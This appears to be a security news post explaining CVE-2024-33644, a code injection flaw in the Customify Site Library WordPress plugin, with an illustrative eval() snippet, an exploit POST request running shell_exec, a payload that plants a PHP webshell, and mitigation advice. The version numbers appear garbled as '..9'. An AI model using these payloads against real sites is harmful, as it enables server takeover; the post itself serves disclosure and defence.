CVE CyberSecurity Database News

CVE-2024-33644 - How a Code Injection Bug in Customify Site Library Plugin Threatens WordPress Sites

Poster -

CVE-2024-33644 exposes a significant vulnerability in the Customify Site Library WordPress plugin. This bug, officially named "Improper Control of Generation of Code ('Code Injection')," allows attackers to inject and execute malicious code, potentially taking complete control over affected websites. It affects plugin versions from the initial release through ..9.

In this in-depth post, you’ll learn how this vulnerability works, techniques for possible exploitation, and steps to protect your site.

What is Customify Site Library?

The Customify Site Library is a WordPress plugin designed to provide users with a library of pre-made website templates. Site owners use it to kick-start projects quickly by importing page designs and demo content.

How Does CVE-2024-33644 Happen?

Improperly handling user input was at the heart of this vulnerability. The plugin failed to sanitize or validate certain variables received via HTTP requests (POST or GET). As a result, attacker-supplied input could be inserted into PHP code or WordPress settings and executed by the server.

Here's a simplified version of the vulnerable code found in version ..9

// Inside inc/importer/class-customify-site-import.php

if ( isset($_POST['site-library-data']) ) {
    $site_data = $_POST['site-library-data'];
    // Dangerous: Direct use of $site_data in eval
    eval($site_data); // <-- Code Injection!
}

The issue occurs because eval() takes a string and executes it as PHP code. If an attacker can manipulate site-library-data, they can run arbitrary PHP on your server.

An attacker prepares a POST request with code like this

POST /wp-admin/admin-ajax.php?action=customify_import HTTP/1.1
Host: victimsite.com
Content-Type: application/x-www-form-urlencoded

site-library-data=echo shell_exec('id');exit;

Step 2: Send the Malicious Request

Since the endpoint does not verify the input, the server evaluates the injected PHP. Here, the attacker gets the system's user ID, but more dangerous payloads (like creating webshells) are also possible.

Exploit Confirmation

If successful, the server’s response will include the current process user, confirming code execution.

Just as easily, the attacker can write a simple webshell

site-library-data=file_put_contents('shell.php','<?php system($_GET["cmd"]); ?>');

Now, victimsite.com/shell.php?cmd=ls gives the attacker shell access.

Who is at Risk?

Any WordPress website running Customify Site Library plugin version ..9 or below. This is particularly dangerous on shared hosting or if WordPress runs with elevated privileges.

Update the Plugin:

The plugin authors have *not yet* published a patched release as of this writing (check official WordPress plugin page for updates).

Web Application Firewalls:

Solutions like Wordfence or Sucuri can block malicious requests.

References & Further Reading

- Official Plugin Page
- WordPress.org Security Team
- NVD Entry for CVE-2024-33644 *(check when populated)*


Summary:
CVE-2024-33644 is a critical code injection bug in Customify Site Library plugin up to version ..9. It lets attackers run PHP on your server, take over your site, or plant backdoors. If you use this plugin, act right away: update, disable, or remove it until a safe version is out.

Stay vigilant and prioritize your WordPress security!

Timeline

Published on: 05/17/2024 09:15:42 UTC
Last modified on: 05/17/2024 18:36:05 UTC